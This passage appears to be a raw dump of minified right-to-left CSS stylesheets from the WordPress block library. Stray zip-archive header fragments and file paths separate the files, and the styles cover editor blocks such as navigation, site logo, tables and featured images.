solid;margin-bottom:16px;width:100%}.wp-block-navigation__responsive-container-open.components-button{opacity:1}.wp-block-navigation__menu-inspector-controls{overflow-x:auto}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{height:12px;width:12px}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{background-color:initial}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{background-color:#949494}.wp-block-navigation__menu-inspector-controls{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{scrollbar-color:#949494 #0000}.wp-block-navigation__menu-inspector-controls{will-change:transform}@media (hover:none){.wp-block-navigation__menu-inspector-controls{scrollbar-color:#949494 #0000}}.wp-block-navigation__menu-inspector-controls__empty-message{margin-right:24px}.editor-sidebar__panel .wp-block-navigation__submenu-header{margin-bottom:0;margin-top:0}.wp-block-navigation__submenu-accessibility-notice{grid-column:span 2}.wp-block-navigation .block-list-appender{position:relative}.wp-block-navigation .has-child{cursor:pointer}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{z-index:29}.wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;overflow:visible!important;visibility:visible!important;width:auto!important}.wp-block-navigation-item .wp-block-navigation-item__content{cursor:text}.wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{min-width:20px}.wp-block-navigation-item .block-list-appender{margin:16px 16px 16px auto}.wp-block-navigation-link__invalid-item{color:#000}.wp-block-navigation-link__placeholder{background-image:none!important;box-shadow:none!important;position:relative;text-decoration:none!important}.wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{-webkit-text-decoration:wavy underline;text-decoration:wavy underline;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none;text-underline-offset:.25rem}.wp-block-navigation-link__placeholder.wp-block-navigation-item__content{cursor:pointer}.link-control-transform{border-top:1px solid #ccc;padding:0 16px 8px}.link-control-transform__subheading{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.link-control-transform__items{display:flex;justify-content:space-between}.link-control-transform__item{flex-basis:33%;flex-direction:column;gap:8px;height:auto}.link-ui-page-creator{max-width:350px;min-width:auto;padding-top:8px;width:90vw}.link-ui-page-creator__inner{padding:16px}.link-ui-page-creator__back{margin-right:8px;text-transform:uppercase}.navigation-link-control__error-text{color:#cc1818}.wp-block-navigation-submenu{display:block}.wp-block-navigation-submenu .wp-block-navigation__submenu-container{z-index:28}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{height:auto!important;min-width:200px!important;opacity:1!important;position:absolute;right:-1px;top:100%;visibility:visible!important;width:auto!important}@media (min-width:782px){.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{right:100%;top:-1px}.wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:#0000;content:"";display:block;height:100%;left:100%;position:absolute;width:.5em}}.block-editor-block-list__block[data-type="core/nextpage"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-nextpage{display:block;text-align:center;white-space:nowrap}.wp-block-nextpage>span{background:#fff;border-radius:4px;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;padding:6px 8px;position:relative;text-transform:uppercase}.wp-block-nextpage:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}.wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{display:contents;flex:1}.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{flex:inherit}.wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{display:block}.wp-block-pages-list__item__link{pointer-events:none}@media (min-width:600px){.wp-block-page-list-modal{max-width:480px}}.wp-block-page-list-modal-buttons{display:flex;gap:12px;justify-content:flex-end}.wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;visibility:visible;width:auto}.wp-block-page-list__loading-indicator-container{padding:8px 12px}.block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{min-height:auto!important}.block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{opacity:1}.block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{opacity:0}.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}.is-zoomed-out .block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{opacity:0}.wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{display:inline}.wp-block-pullquote.is-style-solid-color blockquote p{font-size:32px}.wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation{font-style:normal;text-transform:none}.wp-block-pullquote__citation{color:inherit}.wp-block-rss li a>div{display:inline}.wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{flex:1 1 auto}.wp-block-rss .wp-block-rss{all:inherit;margin:0;padding:0}.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{margin:auto}.wp-block-search :where(.wp-block-search__button){align-items:center;border-radius:initial;display:flex;height:auto;justify-content:center;text-align:center}.wp-block-search__inspector-controls .components-base-control{margin-bottom:0}.block-editor-block-list__block[data-type="core/separator"]{padding-bottom:.1px;padding-top:.1px}.blocks-shortcode__textarea{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important;resize:none}@media (min-width:600px){.blocks-shortcode__textarea{font-size:13px!important}}.blocks-shortcode__textarea:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid #0000!important}.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{display:table;margin-left:auto;margin-right:auto}.wp-block-site-logo a{pointer-events:none}.wp-block-site-logo .custom-logo-link{cursor:inherit}.wp-block-site-logo .custom-logo-link:focus{box-shadow:none}.wp-block-site-logo img{display:block;height:auto;max-width:100%}.wp-block-site-logo.is-transient{position:relative}.wp-block-site-logo.is-transient img{opacity:.3}.wp-block-site-logo.is-transient .components-spinner{margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}.wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{height:60px;width:60px}.wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{border-radius:inherit}.wp-block-site-logo.wp-block-site-logo .components-placeholder{align-items:center;border-radius:inherit;display:flex;height:100%;justify-content:center;min-height:48px;min-width:48px;padding:0;width:100%}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{display:none}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;margin:auto;padding:0;position:relative;width:48px}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{color:inherit}.block-library-site-logo__inspector-media-replace-container{position:relative}.block-library-site-logo__inspector-media-replace-container .components-drop-zone__content-icon{display:none}.block-library-site-logo__inspector-media-replace-container button.components-button{box-shadow:inset 0 0 0 1px #ccc;color:#1e1e1e;display:block;height:40px;width:100%}.block-library-site-logo__inspector-media-replace-container button.components-button:hover{color:var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container button.components-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-library-site-logo__inspector-media-replace-container .components-dropdown{display:block}.block-library-site-logo__inspector-media-replace-container img{aspect-ratio:1;border-radius:50%!important;box-shadow:inset 0 0 0 1px #0003;min-width:20px;width:20px}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{display:flex;height:40px;padding:6px 12px}.wp-block-site-tagline__placeholder,.wp-block-site-title__placeholder{border:1px dashed;padding:1em 0}.wp-block-social-links .wp-social-link{line-height:0}.wp-block-social-link-anchor{align-items:center;background:none;border:0;box-sizing:border-box;color:currentColor;cursor:pointer;display:inline-flex;font-family:inherit;font-size:inherit;font-weight:inherit;height:auto;margin:0;opacity:1;padding:.25em}.wp-block-social-link-anchor:hover{transform:none}:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link button){padding-left:.6666666667em;padding-right:.6666666667em}:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link button){padding:0}.wp-block-social-link__toolbar_content_text{width:250px}.wp-block-social-links div.block-editor-url-input{display:inline-block;margin-right:8px}.wp-social-link:hover{transform:none}:root :where(.wp-block-social-links){padding:0}.wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{justify-content:center}.block-editor-block-preview__content .components-button:disabled{opacity:1}.wp-social-link.wp-social-link__is-incomplete{opacity:.5}.wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{opacity:1}.wp-block-social-links .block-list-appender{position:static}.wp-block-social-links .block-list-appender .block-editor-inserter{font-size:inherit}.wp-block-social-links .block-list-appender .block-editor-button-block-appender{font-size:inherit;height:1.5em;padding:0;width:1.5em}.block-editor-block-list__block[data-type="core/spacer"]:before{content:"";display:block;height:100%;min-height:8px;min-width:8px;position:absolute;width:100%;z-index:1}.block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{background:#0000001a}.is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{background:#ffffff26}.block-library-spacer__resize-container{clear:both}.block-library-spacer__resize-container:not(.is-resizing){height:100%!important;width:100%!important}.block-library-spacer__resize-container .components-resizable-box__handle:before{content:none}.block-library-spacer__resize-container.resize-horizontal{height:100%!important;margin-bottom:0}.wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{height:auto}.wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{width:auto}.wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{word-break:break-word}.wp-block[data-align=center]>.wp-block-table{text-align:initial}.wp-block[data-align=center]>.wp-block-table table{margin:0 auto}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table td.is-selected,.wp-block-table th.is-selected{border-color:var(--wp-admin-theme-color);border-style:double;box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{border:1px solid}.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-start;display:flex;flex-direction:column;gap:8px}@media (min-width:782px){.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-end;flex-direction:row}}.blocks-table__placeholder-input{width:112px}.wp-block-tag-cloud .wp-block-tag-cloud{border:none;border-radius:inherit;margin:0;padding:0}.block-editor-template-part__selection-modal{z-index:1000001}.block-editor-template-part__selection-modal .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:1280px){.block-editor-template-part__selection-modal .block-editor-block-patterns-list{column-count:3}}.block-editor-template-part__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.block-library-template-part__selection-search{background:#fff;padding:16px 0;position:sticky;top:0;z-index:2}.block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{outline-color:var(--wp-block-synced-color)}.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.has-editable-outline:after{border:none}.wp-block-term-template .term-loading .term-loading-placeholder{background-color:#f0f0f0;border-radius:2px;height:1.5em;margin-bottom:.25em;width:100%}@media not (prefers-reduced-motion){.wp-block-term-template .term-loading .term-loading-placeholder{animation:loadingpulse 1.5s ease-in-out infinite}}@keyframes loadingpulse{0%{opacity:1}50%{opacity:.5}to{opacity:1}}.wp-block-text-columns .block-editor-rich-text__editable:focus{outline:1px solid #ddd}.wp-block[data-align=center]>.wp-block-video{text-align:center}.wp-block-video{position:relative}.wp-block-video.is-transient video{opacity:.3}.wp-block-video .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.block-library-video-tracks-editor{z-index:159990}.block-library-video-tracks-editor__track-list-track{padding-right:12px}.block-library-video-tracks-editor__single-track-editor-kind-select{max-width:240px}.block-library-video-tracks-editor__single-track-editor-edit-track-label,.block-library-video-tracks-editor__tracks-informative-message-title{color:#757575;display:block;font-size:11px;font-weight:500;margin-top:4px;text-transform:uppercase}.block-library-video-tracks-editor>.components-popover__content{width:360px}.block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{padding:0}.block-library-video-tracks-editor__tracks-informative-message{padding:8px}.block-library-video-tracks-editor__tracks-informative-message-description{margin-bottom:0}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:2;column-gap:24px}@media (min-width:1280px){.block-library-query-pattern__selection-modal .block-editor-block-patterns-list{column-count:3}}.block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{break-inside:avoid-column}.block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{background:#fff;margin-bottom:-4px;padding:16px 0;position:sticky;top:0;transform:translateY(-4px);z-index:2}@media (min-width:600px){.wp-block-query__enhanced-pagination-modal{max-width:480px}}.block-editor-block-settings-menu__popover.is-expanded{overflow-y:scroll}.block-editor-block-settings-menu__popover .block-library-query-pattern__selection-content{height:100%}.block-editor-block-settings-menu__popover .block-editor-block-patterns-list{display:grid;grid-template-columns:1fr}@media (min-width:600px){.block-editor-block-settings-menu__popover .block-editor-block-patterns-list{grid-template-columns:1fr 1fr}}.block-editor-block-settings-menu__popover .block-editor-block-patterns-list{grid-gap:12px;min-width:280px}@media (min-width:600px){.block-editor-block-settings-menu__popover .block-editor-block-patterns-list{min-width:480px}}.block-editor-block-settings-menu__popover .block-editor-block-patterns-list__list-item{margin-bottom:0}.wp-block-query>.block-editor-media-placeholder.is-small{min-height:60px}.wp-block[data-align=center]>.wp-block-query-pagination{justify-content:center}:where(.editor-styles-wrapper) .wp-block-query-pagination{max-width:100%}:where(.editor-styles-wrapper) .wp-block-query-pagination.block-editor-block-list__layout{margin:0}.wp-block-query-pagination-numbers a{text-decoration:underline}.wp-block-query-pagination-numbers .page-numbers{margin-left:2px}.wp-block-query-pagination-numbers .page-numbers:last-child{margin-right:0}.wp-block-post-featured-image .block-editor-media-placeholder{backdrop-filter:none;z-index:1}.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{align-items:center;display:flex;justify-content:center;padding:0}.wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{display:none}.wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;margin:auto;padding:0;position:relative;width:48px}.wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{color:inherit}.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{min-height:200px}.wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){border-right-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){border-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){border-top-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){border-left-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){border-bottom-style:solid}.wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){border-right-style:solid}.wp-block-post-featured-image[style*=height] .components-placeholder{height:100%;min-height:48px;min-width:48px;width:100%}.wp-block-post-featured-image>a{pointer-events:none}.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-button,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__instructions,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__label{opacity:1;pointer-events:auto}.wp-block-post-featured-image.is-transient{position:relative}.wp-block-post-featured-image.is-transient img{opacity:.3}.wp-block-post-featured-image.is-transient .components-spinner{position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}div[data-type="core/post-featured-image"] img{display:block;height:auto;max-width:100%}.wp-block-post-comments-form *{pointer-events:none}.wp-block-post-comments-form .block-editor-warning *{pointer-events:auto}.wp-element-button{cursor:revert}.wp-element-button[role=textbox]{cursor:text}.block-library-poster-image__container{position:relative}.block-library-poster-image__container:focus .block-library-poster-image__actions,.block-library-poster-image__container:focus-within .block-library-poster-image__actions,.block-library-poster-image__container:hover .block-library-poster-image__actions{opacity:1}.block-library-poster-image__container .block-library-poster-image__actions.block-library-poster-image__actions-select{margin-top:16px;opacity:1}.block-library-poster-image__container .components-drop-zone__content{border-radius:2px}.block-library-poster-image__container .components-drop-zone .components-drop-zone__content-inner{align-items:center;display:flex;gap:8px}.block-library-poster-image__container .components-drop-zone .components-drop-zone__content-inner .components-drop-zone__content-icon{margin:0}.block-library-poster-image__container .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.block-library-poster-image__preview{display:flex;height:auto!important;justify-content:center;min-height:40px;outline:1px solid #0000001a;outline-offset:-1px;overflow:hidden;padding:0;width:100%}.block-library-poster-image__preview .block-library-poster-image__preview-image{aspect-ratio:2/1;object-fit:cover;object-position:50% 50%;width:100%}.block-library-poster-image__actions:not(.block-library-poster-image__actions-select){bottom:0;opacity:0;padding:8px;position:absolute}@media not (prefers-reduced-motion){.block-library-poster-image__actions:not(.block-library-poster-image__actions-select){transition:opacity 50ms ease-out}}.block-library-poster-image__actions:not(.block-library-poster-image__actions-select) .block-library-poster-image__action{backdrop-filter:blur(16px) saturate(180%);background:#ffffffbf}.block-library-poster-image__actions .block-library-poster-image__action{flex-grow:1;justify-content:center}:root .editor-styles-wrapper .has-very-light-gray-background-color{background-color:#eee}:root .editor-styles-wrapper .has-very-dark-gray-background-color{background-color:#313131}:root .editor-styles-wrapper .has-very-light-gray-color{color:#eee}:root .editor-styles-wrapper .has-very-dark-gray-color{color:#313131}:root .editor-styles-wrapper .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(-135deg,#00d084,#0693e3)}:root .editor-styles-wrapper .has-purple-crush-gradient-background{background:linear-gradient(-135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .editor-styles-wrapper .has-hazy-dawn-gradient-background{background:linear-gradient(-135deg,#faaca8,#dad0ec)}:root .editor-styles-wrapper .has-subdued-olive-gradient-background{background:linear-gradient(-135deg,#fafae1,#67a671)}:root .editor-styles-wrapper .has-atomic-cream-gradient-background{background:linear-gradient(-135deg,#fdd79a,#004a59)}:root .editor-styles-wrapper .has-nightshade-gradient-background{background:linear-gradient(-135deg,#330968,#31cdcf)}:root .editor-styles-wrapper .has-midnight-gradient-background{background:linear-gradient(-135deg,#020381,#2874fc)}:where(.editor-styles-wrapper) .has-regular-font-size{font-size:16px}:where(.editor-styles-wrapper) .has-larger-font-size{font-size:42px}:where(.editor-styles-wrapper) iframe:not([frameborder]){border:0}PK!)f&dist/block-library/classic-rtl.min.cssnuȯ.wp-block-button__link{background-color:#32373c;border-radius:9999px;box-shadow:none;color:#fff;font-size:1.125em;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-file__button{background:#32373c;color:#fff}.wp-block-accordion-heading{margin:0}.wp-block-accordion-heading__toggle{background-color:inherit!important;color:inherit!important}.wp-block-accordion-heading__toggle:not(:focus-visible){outline:none}.wp-block-accordion-heading__toggle:focus,.wp-block-accordion-heading__toggle:hover{background-color:inherit!important;border:none;box-shadow:none;color:inherit;padding:var(--wp--preset--spacing--20,1em) 0;text-decoration:none}.wp-block-accordion-heading__toggle:focus-visible{outline:auto;outline-offset:0}PK!m %dist/block-library/common-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(-135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(-135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(-135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(-135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(-135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(-135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(-135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;line-height:normal;padding:15px 23px 14px;right:5px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){border-left-style:solid}html :where([style*=border-bottom-color]){border-bottom-style:solid}html :where([style*=border-left-color]){border-right-style:solid}html :where([style*=border-width]){border-style:solid}html :where([style*=border-top-width]){border-top-style:solid}html :where([style*=border-right-width]){border-left-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-right-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}PK!u%%!dist/block-library/editor-rtl.cssnuȯ.wp-block-archives .wp-block-archives{ border:0; margin:0; } .wp-block-audio{ margin-left:0; margin-right:0; position:relative; } .wp-block-audio.is-transient audio{ opacity:.3; } .wp-block-audio .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .wp-block-avatar__image img{ width:100%; } .wp-block-avatar.aligncenter .components-resizable-box__container{ margin:0 auto; } .wp-block[data-align=center]>.wp-block-button{ margin-left:auto; margin-right:auto; text-align:center; } .wp-block[data-align=right]>.wp-block-button{ text-align:right; } .wp-block-button{ cursor:text; position:relative; } .wp-block-button:focus{ box-shadow:0 0 0 1px #fff, 0 0 0 3px var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:-2px; } .wp-block-button[data-rich-text-placeholder]:after{ opacity:.8; } div[data-type="core/button"]{ display:table; } .wp-block-buttons>.wp-block,.wp-block-buttons>.wp-block-button.wp-block-button.wp-block-button.wp-block-button.wp-block-button{ margin:0; } .wp-block-buttons>.block-list-appender{ align-items:center; display:inline-flex; } .wp-block-buttons.is-vertical>.block-list-appender .block-list-appender__toggle{ justify-content:flex-start; } .wp-block-buttons>.wp-block-button:focus{ box-shadow:none; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center]{ margin-left:auto; margin-right:auto; margin-top:0; width:100%; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block[data-align=center] .wp-block-button{ margin-bottom:0; } .wp-block[data-align=center]>.wp-block-buttons{ align-items:center; justify-content:center; } .wp-block[data-align=right]>.wp-block-buttons{ justify-content:flex-end; } .wp-block-categories ul{ padding-right:2.5em; } .wp-block-categories ul ul{ margin-top:6px; } [data-align=center] .wp-block-categories{ text-align:center; } .wp-block-categories__indentation{ padding-right:16px; } .wp-block-code code{ background:none; } .wp-block-columns :where(.wp-block){ margin-left:0; margin-right:0; max-width:none; } html :where(.wp-block-column){ margin-bottom:0; margin-top:0; } 